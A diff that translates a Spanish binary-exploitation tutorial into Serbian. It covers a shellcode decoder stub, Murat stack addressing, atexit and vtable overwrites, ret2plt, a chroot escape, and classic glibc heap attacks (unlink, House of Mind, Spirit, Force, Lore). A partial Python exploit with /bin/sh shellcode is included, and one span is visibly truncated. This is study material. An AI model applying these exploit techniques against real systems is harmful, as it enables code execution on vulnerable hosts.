+Sastoje se od šifrovanih shell-ova koji imaju mali kod koji ih dešifruje i preskoči na njega, koristeći trik Call-Pop, ovo bi bio **primer šifrovanja cezara**:
 ```
 global _start
 _start:
-            jmp short magic
+jmp short magic
 init:
-            pop     esi
-            xor      ecx, ecx
-            mov    cl,0                              ; Hay que sustituir el 0 por la longitud del shellcode (es lo que recorrerá)
+pop     esi
+xor      ecx, ecx
+mov    cl,0                              ; Hay que sustituir el 0 por la longitud del shellcode (es lo que recorrerá)
 desc:
-            sub     byte[esi + ecx -1], 0 ; Hay que sustituir el 0 por la cantidad de bytes a restar (cifrado cesar)
-            sub     cl, 1
-            jnz       desc
-            jmp     short sc
+sub     byte[esi + ecx -1], 0 ; Hay que sustituir el 0 por la cantidad de bytes a restar (cifrado cesar)
+sub     cl, 1
+jnz       desc
+jmp     short sc
 magic:
-            call init
+call init
 sc:
-            ;Aquí va el shellcode
+;Aquí va el shellcode
 ```
+## **5.Dopunske metode**
 
-## **5.Métodos complementarios**
+**Murat tehnika**
 
-**Técnica de Murat**
+U linuxu se svi programi mapiraju počinjući od 0xbfffffff
 
-En linux todos los progamas se mapean comenzando en 0xbfffffff
+Gledajući kako se gradi stek novog procesa u linuxu, može se razviti exploit tako da se program pokrene u okruženju čija je jedina promenljiva shellcode. Adresa ove se može izračunati kao: addr = 0xbfffffff - 4 - strlen(PUNO_izvršnog_imena) - strlen(shellcode)
 
-Viendo como se construye la pila de un nuevo proceso en linux se puede desarrollar un exploit de forma que programa sea arrancado en un entorno cuya única variable sea la shellcode. La dirección de esta entonces se puede calcular como: addr = 0xbfffffff - 4 - strlen(NOMBRE_ejecutable_completo) - strlen(shellcode)
+Na ovaj način se jednostavno dobija adresa gde se nalazi promenljiva okruženja sa shellcode.
 
-De esta forma se obtendría de forma sensilla la dirección donde está la variable de entorno con la shellcode.
-
-Esto se puede hacer gracias a que la función execle permite crear un entorno que solo tenga las variables de entorno que se deseen
+To se može uraditi zahvaljujući funkciji execle koja omogućava kreiranje okruženja koje ima samo željene promenljive okruženja.
 
 ##
 
@@ -140,124 +130,124 @@ Esto se puede hacer gracias a que la función execle permite crear un entorno qu
 
 ### **Format Strings to Buffer Overflows**
 
-Tthe **sprintf moves** a formatted string **to** a **variable.** Therefore, you could abuse the **formatting** of a string to cause a **buffer overflow in the variable** where the content is copied to.\
-For example, the payload `%.44xAAAA` will **write 44B+"AAAA" in the variable**, which may cause a buffer overflow.
+**sprintf moves** formatirani string **u** **promenljivu.** Stoga, možete zloupotrebiti **formatiranje** stringa da izazovete **buffer overflow u promenljivoj** u koju se sadržaj kopira.\
+Na primer, payload `%.44xAAAA` će **napisati 44B+"AAAA" u promenljivu**, što može izazvati buffer overflow.
 
-### **\_\_atexit Structures**
+### **\_\_atexit strukture**
 
 > [!CAUTION]
-> Nowadays is very **weird to exploit this**.
+> Danas je veoma **čudno iskoristiti ovo**.
 
-**`atexit()`** is a function to which **other functions are passed as parameters.** These **functions** will be **executed** when executing an **`exit()`** or the **return** of the **main**.\
-If you can **modify** the **address** of any of these **functions** to point to a shellcode for example, you will **gain control** of the **process**, but this is currently more complicated.\
-Currently the **addresses to the functions** to be executed are **hidden** behind several structures and finally the address to which it points are not the addresses of the functions, but are **encrypted with XOR** and displacements with a **random key**. So currently this attack vector is **not very useful at least on x86** and **x64_86**.\
-The **encryption function** is **`PTR_MANGLE`**. **Other architectures** such as m68k, mips32, mips64, aarch64, arm, hppa... **do not implement the encryption** function because it **returns the same** as it received as input. So these architectures would be attackable by this vector.
+**`atexit()`** je funkcija kojoj se **druge funkcije prosleđuju kao parametri.** Ove **funkcije** će biti **izvršene** prilikom izvršavanja **`exit()`** ili **povratka** iz **main**.\
+Ako možete **modifikovati** **adresu** bilo koje od ovih **funkcija** da pokazuje na shellcode, na primer, dobićete **kontrolu** nad **procesom**, ali to je trenutno komplikovanije.\
+Trenutno su **adrese funkcija** koje treba izvršiti **sakrivene** iza nekoliko struktura i konačno adresa na koju pokazuje nije adresa funkcija, već je **kriptovana XOR** i pomeranjima sa **nasumičnim ključem**. Tako da je trenutno ovaj vektorski napad **ne baš koristan, barem na x86** i **x64_86**.\
+**Funkcija za enkripciju** je **`PTR_MANGLE`**. **Druge arhitekture** kao što su m68k, mips32, mips64, aarch64, arm, hppa... **ne implementiraju funkciju enkripcije** jer **vraća isto** što je primila kao ulaz. Tako da bi ove arhitekture bile podložne ovom vektoru napada.
 
 ### **setjmp() & longjmp()**
 
 > [!CAUTION]
-> Nowadays is very **weird to exploit this**.
+> Danas je veoma **čudno iskoristiti ovo**.
 
-**`Setjmp()`** allows to **save** the **context** (the registers)\
-**`longjmp()`** allows to **restore** the **context**.\
-The **saved registers** are: `EBX, ESI, EDI, ESP, EIP, EBP`\
-What happens is that EIP and ESP are passed by the **`PTR_MANGLE`** function, so the **architecture vulnerable to this attack are the same as above**.\
-They are useful for error recovery or interrupts.\
-However, from what I have read, the other registers are not protected, **so if there is a `call ebx`, `call esi` or `call edi`** inside the function being called, control can be taken over. Or you could also modify EBP to modify the ESP.
+**`Setjmp()`** omogućava **čuvanje** **konteksta** (registara)\
+**`longjmp()`** omogućava **obnavljanje** **konteksta**.\
+**Sačuvani registri** su: `EBX, ESI, EDI, ESP, EIP, EBP`\
+Šta se dešava je da su EIP i ESP prosleđeni funkciji **`PTR_MANGLE`**, tako da su **arhitekture podložne ovom napadu iste kao gore**.\
+Koriste se za oporavak od grešaka ili prekida.\
+Međutim, prema onome što sam pročitao, ostali registri nisu zaštićeni, **tako da ako postoji `call ebx`, `call esi` ili `call edi`** unutar pozvane funkcije, kontrola može biti preuzeta. Ili možete takođe modifikovati EBP da modifikujete ESP.
 
-**VTable y VPTR en C++**
+**VTable i VPTR u C++**
 
-Each class has a **Vtable** which is an array of **pointers to methods**.
+Svaka klasa ima **Vtable** koja je niz **pokazivača na metode**.
 
-Each object of a **class** has a **VPtr** which is a **pointer** to the arrayof its class. The VPtr is part of the header of each object, so if an **overwrite** of the **VPtr** is achieved it could be **modified** to **point** to a dummy method so that executing a function would go to the shellcode.
+Svaki objekat klase ima **VPtr** koji je **pokazivač** na niz svoje klase. VPtr je deo zaglavlja svakog objekta, tako da ako se postigne **prepisivanje** **VPtr** može se **modifikovati** da **pokazuje** na lažnu metodu tako da izvršavanje funkcije ide na shellcode.
 
-## **Medidas preventivas y evasiones**
+## **Preventivne mere i izbegavanja**
 
 ###
 
-**Reemplazo de Libsafe**
+**Zamena Libsafe**
 
-Se activa con: LD_PRELOAD=/lib/libsafe.so.2\
-o\
+Aktivira se sa: LD_PRELOAD=/lib/libsafe.so.2\
+ili\
 “/lib/libsave.so.2” > /etc/ld.so.preload
 
-Se interceptan las llamadas a algunas funciones inseguras por otras seguras. No está estandarizado. (solo para x86, no para compilaxiones con -fomit-frame-pointer, no compilaciones estaticas, no todas las funciones vulnerables se vuelven seguras y LD_PRELOAD no sirve en binarios con suid).
+Interceptuju se pozivi nekim nesigurnim funkcijama sa drugim sigurnim. Nije standardizovano. (samo za x86, ne za kompilacije sa -fomit-frame-pointer, ne statičke kompilacije, ne sve ranjive funkcije postaju sigurne i LD_PRELOAD ne funkcioniše u binarnim datotekama sa suid).
 
 **ASCII Armored Address Space**
 
-Consiste en cargar las librería compartidas de 0x00000000 a 0x00ffffff para que siempre haya un byte 0x00. Sin embargo, esto realmente no detiene a penas ningún ataque, y menos en little endian.
+Sastoji se od učitavanja deljenih biblioteka od 0x00000000 do 0x00ffffff kako bi uvek postojao bajt 0x00. Međutim, ovo zapravo ne zaustavlja gotovo nijedan napad, a još manje u little endian.
 
 **ret2plt**
 
-Consiste en realiza un ROP de forma que se llame a la función strcpy@plt (de la plt) y se apunte a la entrada de la GOT y se copie el primer byte de la función a la que se quiere llamar (system()). Acto seguido se hace lo mismo apuntando a GOT+1 y se copia el 2ºbyte de system()… Al final se llama la dirección guardada en GOT que será system()
+Sastoji se od izvođenja ROP-a tako da se pozove funkcija strcpy@plt (iz plt) i pokaže na ulaz u GOT i kopira prvi bajt funkcije koju želite da pozovete (system()). Zatim se radi isto pokazujući na GOT+1 i kopira se 2. bajt system()… Na kraju se poziva adresa sačuvana u GOT koja će biti system()
 
-**Jaulas con chroot()**
+**Kave sa chroot()**
 
-debootstrap -arch=i386 hardy /home/user —> Instala un sistema básico bajo un subdirectorio específico
+debootstrap -arch=i386 hardy /home/user —> Instalira osnovni sistem pod specifičnim poddirektorijumom
 
-Un admin puede salir de una de estas jaulas haciendo: mkdir foo; chroot foo; cd ..
+Admin može izaći iz jedne od ovih kave praveći: mkdir foo; chroot foo; cd ..
 
-**Instrumentación de código**
+**Instrumentacija koda**
 
-Valgrind —> Busca errores\
+Valgrind —> Traži greške\
 Memcheck\
 RAD (Return Address Defender)\
 Insure++
 
-## **8 Heap Overflows: Exploits básicos**
+## **8 Heap Overflows: Osnovni exploit**
 
-**Trozo asignado**
+**Delić dodeljen**
 
 prev_size |\
-size | —Cabecera\
-\*mem | Datos
+size | —Zaglavlje\
+\*mem | Podaci
 
-**Trozo libre**
+**Delić slobodan**
 
 prev_size |\
 size |\
 \*fd | Ptr forward chunk\
-\*bk | Ptr back chunk —Cabecera\
-\*mem | Datos
+\*bk | Ptr back chunk —Zaglavlje\
+\*mem | Podaci
 
-Los trozos libres están en una lista doblemente enlazada (bin) y nunca pueden haber dos trozos libres juntos (se juntan)
+Slobodni delovi su u dvostruko povezanoj listi (bin) i nikada ne mogu postojati dva slobodna dela zajedno (spajaju se)
 
-En “size” hay bits para indicar: Si el trozo anterior está en uso, si el trozo ha sido asignado mediante mmap() y si el trozo pertenece al arena primario.
+U “size” postoje bitovi koji označavaju: Da li je prethodni deo u upotrebi, da li je deo dodeljen putem mmap() i da li deo pripada primarnoj areni.
 
-Si al liberar un trozo alguno de los contiguos se encuentra libre , estos se fusionan mediante la macro unlink() y se pasa el nuevo trozo más grande a frontlink() para que le inserte el bin adecuado.
+Ako prilikom oslobađanja dela neki od susednih bude slobodan, oni se spajaju putem makroa unlink() i novi veći deo se prosleđuje frontlink() da mu umetne odgovarajući bin.
 
 unlink(){\
-BK = P->bk; —> El BK del nuevo chunk es el que tuviese el que ya estaba libre antes\
-FD = P->fd; —> El FD del nuevo chunk es el que tuviese el que ya estaba libre antes\
-FD->bk = BK; —> El BK del siguiente chunk apunta al nuevo chunk\
-BK->fd = FD; —> El FD del anterior chunk apunta al nuevo chunk\
+BK = P->bk; —> BK novog dela je onaj koji je imao prethodno slobodan\
+FD = P->fd; —> FD novog dela je onaj koji je imao prethodno slobodan\
+FD->bk = BK; —> BK sledećeg dela pokazuje na novi deo\
+BK->fd = FD; —> FD prethodnog dela pokazuje na novi deo\
 }
 
-Por lo tanto si conseguimos modificar el P->bk con la dirección de un shellcode y el P->fd con la dirección a una entrada en la GOT o DTORS menos 12 se logra:
+Dakle, ako uspemo da modifikujemo P->bk sa adresom shellcode i P->fd sa adresom do ulaza u GOT ili DTORS minus 12, postiže se:
 
 BK = P->bk = \&shellcode\
 FD = P->fd = &\_\_dtor_end\_\_ - 12\
 FD->bk = BK -> \*((&\_\_dtor_end\_\_ - 12) + 12) = \&shellcode
 
-Y así se se ejecuta al salir del programa la shellcode.
+I tako se shellcode izvršava prilikom izlaska iz programa.
 
-Además, la 4º sentencia de unlink() escribe algo y la shellcode tiene que estar reparada para esto:
+Pored toga, 4. izjava unlink() piše nešto i shellcode mora biti prilagođena za ovo:
 
-BK->fd = FD -> \*(\&shellcode + 8) = (&\_\_dtor_end\_\_ - 12) —> Esto provoca la escritura de 4 bytes a partir del 8º byte de la shellcode, por lo que la primera instrucción de la shellcode debe ser un jmp para saltar esto y caer en unos nops que lleven al resto de la shellcode.
+BK->fd = FD -> \*(\&shellcode + 8) = (&\_\_dtor_end\_\_ - 12) —> Ovo izaziva pisanje 4 bajta počevši od 8. bajta shellcode, tako da prva instrukcija shellcode mora biti jmp da preskoči ovo i padne u nekoliko nops koji vode do ostatka shellcode.
 
-Por lo tanto el exploit se crea:
+Dakle, exploit se kreira:
 
-En el buffer1 metemos la shellcode comenzando por un jmp para que caiga en los nops o en el resto de la shellcode.
+U buffer1 stavljamo shellcode počevši od jmp da padne u nops ili u ostatak shellcode.
 
-Después de la shell code metemos relleno hasta llegar al campo prev_size y size del siguiente trozo. En estos sitios metemos 0xfffffff0 (de forma que se sobrescrita el prev_size para que tenga el bit que dice que está libre) y “-4“(0xfffffffc) en el size (para que cuando compruebe en el 3º trozo si el 2º estaba libre en realidad vaya al prev_size modificado que le dirá que s´está libre) -> Así cuando free() investigue irá al size del 3º pero en realidad irá al 2º - 4 y pensará que el 2º trozo está libre. Y entonces llamará a **unlink()**.
+Nakon shellcode stavljamo popunu do dolaska do polja prev_size i size sledećeg dela. Na ovim mestima stavljamo 0xfffffff0 (tako da se prev_size prepisuje da ima bit koji kaže da je slobodan) i “-4“(0xfffffffc) u size (tako da kada proveri u 3. delu da li je 2. zapravo slobodan, ide na modifikovani prev_size koji će mu reći da je slobodan) -> Tako kada free() istražuje, ići će na size 3. ali zapravo će ići na 2. - 4 i pomisliti da je 2. deo slobodan. I tada će pozvati **unlink()**.
 
-Al llamar a unlink() usará como P->fd los primeros datos del 2º trozo por lo que ahí se meterá la dirección que se quieres sobreescribir - 12(pues en FD->bk le sumará 12 a la dirección guardada en FD) . Y en esa dirección introducirá la segunda dirección que encuentre en el 2º trozo, que nos interesará que sea la dirección a la shellcode(P->bk falso).
+Pozivom unlink() koristiće kao P->fd prve podatke 2. dela, tako da će tu biti adresa koju želite da prepišete - 12 (jer će u FD->bk dodati 12 na sačuvanu adresu u FD). I na toj adresi će uneti drugu adresu koju pronađe u 2. delu, koja će nam biti zanimljiva da bude adresa do shellcode (lažni P->bk).
 
 **from struct import \***
 
 **import os**
 
-**shellcode = "\xeb\x0caaaabbbbcccc" #jm 12 + 12bytes de relleno**
+**shellcode = "\xeb\x0caaaabbbbcccc" #jm 12 + 12 bajtova popune**
 
 **shellcode += "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" \\**
 
@@ -265,73 +255,73 @@ Al llamar a unlink() usará como P->fd los primeros datos del 2º trozo por lo q
 
 **"\x80\xe8\xdc\xff\xff\xff/bin/sh";**
 
-**prev_size = pack("\ Devuelve un puntero a la dirección donde comienza el trozo (mem-8)
+p = mem2chunk(mem); —> Vraća pokazivač na adresu gde počinje deo (mem-8)
 
 …
 
@@ -351,11 +341,11 @@ ar_ptr = arena_for_chunk(p); —> chunk_non_main_arena(ptr)?heap_for_ptr(ptr)->a
 
 }
 
-En \[1] comprueba el campo size el bit NON_MAIN_ARENA, el cual se puede alterar para que la comprobación devuelva true y ejecute heap_for_ptr() que hace un and a “mem” dejando a 0 los 2.5 bytes menos importantes (en nuestro caso de 0x0804a000 deja 0x08000000) y accede a 0x08000000->ar_ptr (como si fuese un struct heap_info)
+U \[1] proverava se polje size bit NON_MAIN_ARENA, koji se može izmeniti da provera vrati true i izvrši heap_for_ptr() koji radi and na “mem” ostavljajući 0 na 2.5 manje bitova (u našem slučaju od 0x0804a000 ostavlja 0x08000000) i pristupa 0x08000000->ar_ptr (kao da je struktura heap_info)
 
-De esta forma si podemos controlar un trozo por ejemplo en 0x0804a000 y se va a liberar un trozo en **0x081002a0** podemos llegar a la dirección 0x08100000 y escribir lo que queramos, por ejemplo **0x0804a000**. Cuando este segundo trozo se libere se encontrará que heap_for_ptr(ptr)->ar_ptr devuelve lo que hemos escrito en 0x08100000 (pues se aplica a 0x081002a0 el and que vimos antes y de ahí se saca el valor de los 4 primeros bytes, el ar_ptr)
+Na ovaj način, ako možemo kontrolisati deo, na primer u 0x0804a000 i oslobađa se deo u **0x081002a0**, možemo doći do adrese 0x08100000 i napisati šta god želimo, na primer **0x0804a000**. Kada se ovaj drugi deo oslobodi, otkriće da heap_for_ptr(ptr)->ar_ptr vraća ono što smo napisali u 0x08100000 (jer se primenjuje and na 0x081002a0 koji smo videli ranije i odatle se uzima vrednost prvih 4 bajta, ar_ptr)
 
-De esta forma se llama a \_int_free(ar_ptr, mem), es decir, **\_int_free(0x0804a000, 0x081002a0)**\
+Na ovaj način se poziva \_int_free(ar_ptr, mem), tj. **\_int_free(0x0804a000, 0x081002a0)**\
 **\_int_free(mstate av, Void_t\* mem){**\
 …\
 bck = unsorted_chunks(av);\
@@ -367,36 +357,36 @@ fwd->bk = p;
 
 ..}
 
-Como hemos visto antes podemos controlar el valor de av, pues es lo que escribimos en el trozo que se va a liberar.
+Kao što smo ranije videli, možemo kontrolisati vrednost av, jer je to ono što smo napisali u delu koji će se osloboditi.
 
-Tal y como se define unsorted_chunks, sabemos que:\
+Kao što je definisano unsorted_chunks, znamo da:\
 bck = \&av->bins\[2]-8;\
 fwd = bck->fd = \*(av->bins\[2]);\
 fwd->bk = \*(av->bins\[2] + 12) = p;
 
-Por lo tanto si en av->bins\[2] escribimos el valor de \_\_DTOR_END\_\_-12 en la última instrucción se escribirá en \_\_DTOR_END\_\_ la dirección del segundo trozo.
+Dakle, ako u av->bins\[2] upišemo vrednost \_\_DTOR_END\_\_-12, u poslednjoj instrukciji će se upisati u \_\_DTOR_END\_\_ adresa drugog dela.
 
-Es decir, en el primer trozo tenemos que poner al inicio muchas veces la dirección de \_\_DTOR_END\_\_-12 porque de ahí la sacará av->bins\[2]
+Drugim rečima, u prvom delu moramo na početku više puta staviti adresu \_\_DTOR_END\_\_-12 jer će odatle uzeti av->bins\[2]
 
-En la dirección que caiga la dirección del segundo trozo con los últimos 5 ceros hay que escribir la dirección a este primer trozo para que heap_for_ptr() piense que el ar_ptr está al inicio del primer trozo y saque de ahí el av->bins\[2]
+Na adresi na kojoj padne adresa drugog dela sa poslednjih 5 nula, treba napisati adresu do ovog prvog dela kako bi heap_for_ptr() pomislio da je ar_ptr na početku prvog dela i izvukao odatle av->bins\[2]
 
-En el segundo trozo y gracias al primero sobreescribimos el prev_size con un jump 0x0c y el size con algo para activar -> NON_MAIN_ARENA
+U drugom delu i zahvaljujući prvom prepisujemo prev_size sa jump 0x0c i size sa nečim da aktiviramo -> NON_MAIN_ARENA
 
-A continuación en el trozo 2 ponemos un montón de nops y finalmente la shellcode
+Zatim u delu 2 stavljamo gomilu nops i na kraju shellcode
 
-De esta forma se llamará a \_int_free(TROZO1, TROZO2) y seguirá las instrucciones para escribir en \_\_DTOR_END\_\_ la dirección del prev_size del TROZO2 el cual saltará a la shellcode.
+Na ovaj način će se pozvati \_int_free(TROZO1, TROZO2) i pratiti uputstva da upiše u \_\_DTOR_END\_\_ adresu prev_size TROZO2 koja će preskočiti na shellcode.
 
-Para aplicar esta técnica hace falta que se cumplan algunos requerimientos más que complican un poco más el payload.
+Da bi se primenila ova tehnika, potrebno je da se ispune neki dodatni zahtevi koji dodatno komplikuju payload.
 
-Esta técnica ya no es aplicable pues se aplicó casi el mismo parche que para unlink. Se comparan si el nuevo sitio al que se apunta también le está apuntando a él.
+Ova tehnika više nije primenljiva jer je primenjen gotovo isti patch kao za unlink. Proverava se da li nova adresa na koju se pokazuje takođe pokazuje na nju.
 
 **Fastbin**
 
-Es una variante de The house of mind
+To je varijanta The house of mind
 
-nos interesa llegar a ejecutar el siguiente código al cuál se llega pasada la primera comprobación de la función \_int_free()
+Zanima nas da izvršimo sledeći kod do kojeg se dolazi nakon prve provere funkcije \_int_free()
 
-fb = &(av->fastbins\[fastbin_index(size)] —> Siendo fastbin_index(sz) —> (sz >> 3) - 2
+fb = &(av->fastbins\[fastbin_index(size)] —> Gde je fastbin_index(sz) —> (sz >> 3) - 2
 
 …
 
@@ -404,61 +394,61 @@ p->fd = \*fb
 
 \*fb = p
 
-De esta forma si se pone en “fb” da dirección de una función en la GOT, en esta dirección se pondrá la dirección al trozo sobrescrito. Para esto será necesario que la arena esté cerca de las direcciones de dtors. Más exactamente que av->max_fast esté en la dirección que vamos a sobreescribir.
+Na ovaj način, ako stavimo u “fb” adresu funkcije u GOT, na ovoj adresi će se staviti adresa do prepisanog dela. Za ovo će biti potrebno da arena bude blizu adresa dtors. Tačnije, da av->max_fast bude na adresi koju ćemo prepisati.
 
-Dado que con The House of Mind se vio que nosotros controlábamos la posición del av.
+S obzirom na to da smo sa The House of Mind videli da kontrolišemo poziciju av.
 
-Entones si en el campo size ponemos un tamaño de 8 + NON_MAIN_ARENA + PREV_INUSE —> fastbin_index() nos devolverá fastbins\[-1], que apuntará a av->max_fast
+Dakle, ako u polje size stavimo veličinu od 8 + NON_MAIN_ARENA + PREV_INUSE —> fastbin_index() će nam vratiti fastbins\[-1], koji će pokazivati na av->max_fast
 
-En este caso av->max_fast será la dirección que se sobrescrita (no a la que apunte, sino esa posición será la que se sobrescrita).
+U ovom slučaju av->max_fast će biti adresa koja će se prepisati (ne na koju pokazuje, već ta pozicija će biti prepisana).
 
-Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 8, en este trozo falso solo tenemos que poner un size mayor que 8 (como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops).
+Pored toga, mora se ispuniti da je deo susedni oslobođen mora biti veći od 8 -> S obzirom na to da smo rekli da je size oslobođenog dela 8, u ovom lažnom delu samo treba staviti size veći od 8 (pošto će shellcode ići u oslobođeni deo, na početku će biti potrebno staviti jmp koji pada u nops).
 
-Además, ese mismo trozo falso debe ser menor que av->system_mem. av->system_mem se encuentra 1848 bytes más allá.
+Pored toga, taj isti lažni deo mora biti manji od av->system_mem. av->system_mem se nalazi 1848 bajtova dalje.
 
-Por culpa de los nulos de \_DTOR_END\_ y de las pocas direcciones en la GOT, ninguna dirección de estas secciones sirven para ser sobrescritas, así que veamos como aplicar fastbin para atacar la pila.
+Zbog nula u \_DTOR_END\_ i malo adresa u GOT, nijedna adresa ovih sekcija ne može biti prepisana, tako da vidimo kako primeniti fastbin da napadnemo stek.
 
-Otra forma de ataque es redirigir el **av** hacia la pila.
+Drugi način napada je preusmeriti **av** ka steku.
 
-Si modificamos el size para que de 16 en vez de 8 entonces: fastbin_index() nos devolverá fastbins\[0] y podemos hacer uso de esto para sobreescribir la pila.
+Ako modifikujemo size da bude 16 umesto 8, tada: fastbin_index() će nam vratiti fastbins\[0] i možemo iskoristiti ovo da prepišemo stek.
 
-Para esto no debe haber ningún canary ni valores raros en la pila, de hecho tenemos que encontrarnos en esta: 4bytes nulos + EBP + RET
+Za ovo ne sme biti nikakvog canary-a niti čudnih vrednosti na steku, zapravo se moramo nalaziti u ovoj: 4 bajta nula + EBP + RET
 
-Los 4 bytes nulo se necesitan que el **av** estará a esta dirección y el primero elemento de un **av** es el mutexe que tiene que valer 0.
+4 bajta nula su potrebni da **av** bude na ovoj adresi i prvi element **av** je mutex koji mora biti 0.
 
-El **av->max_fast** será el EBP y será un valor que nos servirá para saltarnos las restricciones.
+**av->max_fast** će biti EBP i biće vrednost koja će nam pomoći da preskočimo ograničenja.
 
-En el **av->fastbins\[0]** se sobreescribirá con la dirección de **p** y será el RET, así se saltará a la shellcode.
+U **av->fastbins\[0]** će se prepisati sa adresom **p** i biće RET, tako da će preskočiti na shellcode.
 
-Además, en **av->system_mem** (1484bytes por encima de la posición en la pila) habrá bastante basura que nos permitirá saltarnos la comprobación que se realiza.
+Pored toga, u **av->system_mem** (1484 bajta iznad pozicije na steku) biće dovoljno smeća koje će nam omogućiti da preskočimo proveru koja se vrši.
 
-Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 16, en este trozo falso solo tenemos que poner un size mayor que 8 (como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops que van después del campo size del nuevo trozo falso).
+Pored toga, mora se ispuniti da je deo susedni oslobođen mora biti veći od 8 -> S obzirom na to da smo rekli da je size oslobođenog dela 16, u ovom lažnom delu samo treba staviti size veći od 8 (pošto će shellcode ići u oslobođeni deo, na početku će biti potrebno staviti jmp koji pada u nops koji dolaze nakon polja size novog lažnog dela).
 
 **The House of Spirit**
 
-En este caso buscamos tener un puntero a un malloc que pueda ser alterable por el atacante (por ej, que el puntero esté en el stack debajo de un posible overflow a una variable).
+U ovom slučaju tražimo da imamo pokazivač na malloc koji može biti izmenjen od strane napadača (na primer, da je pokazivač na steku ispod mogućeg preplavljivanja promenljive).
 
-Así, podríamos hacer que este puntero apuntase a donde fuese. Sin embargo, no cualquier sitio es válido, el tamaño del trozo falseado debe ser menor que av->max_fast y más específicamente igual al tamaño solicitado en una futura llamada a malloc()+8. Por ello, si sabemos que después de este puntero vulnerable se llama a malloc(40), el tamaño del trozo falso debe ser igual a 48.
+Tako bismo mogli učiniti da ovaj pokazivač pokazuje gde god želimo. Međutim, ne može svako mesto biti važno, veličina lažnog dela mora biti manja od av->max_fast i specifično jednaka veličini zatraženoj u budućem pozivu malloc()+8. Stoga, ako znamo da nakon ovog ranjivog pokazivača pozivamo malloc(40), veličina lažnog dela mora biti jednaka 48.
 
-Si por ejemplo el programa preguntase al usuario por un número podríamos introducir 48 y apuntar el puntero de malloc modificable a los siguientes 4bytes (que podrían pertenecer al EBP con suerte, así el 48 queda por detrás, como si fuese la cabecera size). Además, la dirección ptr-4+48 debe cumplir varias condiciones (siendo en este caso ptr=EBP), es decir, 8 < ptr-4+48 < av->system_mem.
+Ako, na primer, program traži od korisnika broj, mogli bismo uneti 48 i usmeriti modifikovani malloc pokazivač na sledećih 4 bajta (koji bi mogli pripadati EBP-u sa srećom, tako da 48 ostane iza, kao da je zaglavlje size). Pored toga, adresa ptr-4+48 mora ispunjavati nekoliko uslova (u ovom slučaju ptr=EBP), tj. 8 < ptr-4+48 < av->system_mem.
 
-En caso de que esto se cumpla, cuando se llame al siguiente malloc que dijimos que era malloc(40) se le asignará como dirección la dirección del EBP. En caso de que el atacante también pueda controlar lo que se escribe en este malloc puede sobreescribir tanto el EBP como el EIP con la dirección que quiera.
+U slučaju da se ovo ispuni, kada se pozove sledeći malloc koji smo rekli da je malloc(40), dodeliće se kao adresa adresa EBP-a. U slučaju da napadač takođe može kontrolisati šta se piše u ovom malloc-u, može prepisati i EBP i EIP sa adresom koju želi.
 
-Esto creo que es porque así cuando lo libere free() guardará que en la dirección que apunta al EBP del stack hay un trozo de tamaño perfecto para el nuevo malloc() que se quiere reservar, así que le asigna esa dirección.
+Mislim da je to zato što će tako kada ga oslobodi free() zadržati da u adresi koja pokazuje na EBP steka postoji deo savršene veličine za novi malloc() koji se želi rezervisati, tako da mu dodeljuje tu adresu.
 
 **The House of Force**
 
-Es necesario:
+Potrebno je:
 
-- Un overflow a un trozo que permita sobreescribir el wilderness
-- Una llamada a malloc() con el tamaño definido por el usuario
-- Una llamada a malloc() cuyos datos puedan ser definidos por el usuario
+- Preplavljivanje dela koje omogućava prepisivanje wilderness
+- Poziv malloc() sa veličinom definisanom od strane korisnika
+- Poziv malloc() čiji podaci mogu biti definisani od strane korisnika
 
-Lo primero que se hace es sobreescribir el size del trozo wilderness con un valor muy grande (0xffffffff), así cual quiera solicitud de memoria lo suficientemente grande será tratada en \_int_malloc() sin necesidad de expandir el heap
+Prvo što se radi je prepisivanje size dela wilderness sa veoma velikom vrednošću (0xffffffff), tako da će svaka zahtevana memorija dovoljno velika biti obrađena u \_int_malloc() bez potrebe za proširenjem heap-a
 
-Lo segundo es alterar el av->top para que apunte a una zona de memoria bajo el control del atacante, como el stack. En av->top se pondrá \&EIP - 8.
+Drugo je izmena av->top da pokazuje na područje memorije pod kontrolom napadača, kao što je stek. U av->top će se staviti \&EIP - 8.
 
-Tenemos que sobreescrbir av->top para que apunte a la zona de memoria bajo el control del atacante:
+Moramo prepisati av->top da pokazuje na područje memorije pod kontrolom napadača:
 
 victim = av->top;
 
@@ -466,86 +456,86 @@ remainder = chunck_at_offset(victim, nb);
 
 av->top = remainder;
 
-Victim recoge el valor de la dirección del trozo wilderness actual (el actual av->top) y remainder es exactamente la suma de esa dirección más la cantidad de bytes solicitados por malloc(). Por lo que si \&EIP-8 está en 0xbffff224 y av->top contiene 0x080c2788, entonces la cantidad que tenemos que reservar en el malloc controlado para que av->top quede apuntando a $EIP-8 para el próximo malloc() será:
+Victim uzima vrednost adrese trenutnog dela wilderness (trenutni av->top) i remainder je tačno zbir te adrese plus količina bajtova zatraženih od malloc(). Tako da ako \&EIP-8 bude na 0xbffff224 i av->top sadrži 0x080c2788, tada će količina koju moramo rezervisati u kontrolisanom malloc-u da bi av->top pokazivao na $EIP-8 za sledeći malloc() biti:
 
 0xbffff224 - 0x080c2788 = 3086207644.
 
-Así se guardará en av->top el valor alterado y el próximo malloc apuntará al EIP y lo podrá sobreescribir.
+Tako će se sačuvati u av->top izmenjena vrednost i sledeći malloc će pokazivati na EIP i moći će ga prepisati.
 
-Es importante saber que el size del nuevo trozo wilderness sea más grande que la solicitud realizada por el último malloc(). Es decir, si el wilderness está apuntando a \&EIP-8, el size quedará justo en el campo EBP del stack.
+Važno je znati da je size novog dela wilderness veći od zahteva postavljenog od poslednjeg malloc(). Drugim rečima, ako wilderness pokazuje na \&EIP-8, size će biti tačno u polju EBP steka.
 
 **The House of Lore**
 
-**Corrupción SmallBin**
+**Korupcija SmallBin**
 
-Los trozos liberados se introducen en el bin en función de su tamaño. Pero antes de introduciros se guardan en unsorted bins. Un trozo es liberado no se mete inmediatamente en su bin sino que se queda en unsorted bins. A continuación, si se reserva un nuevo trozo y el anterior liberado le puede servir se lo devuelve, pero si se reserva más grande, el trozo liberado en unsorted bins se mete en su bin adecuado.
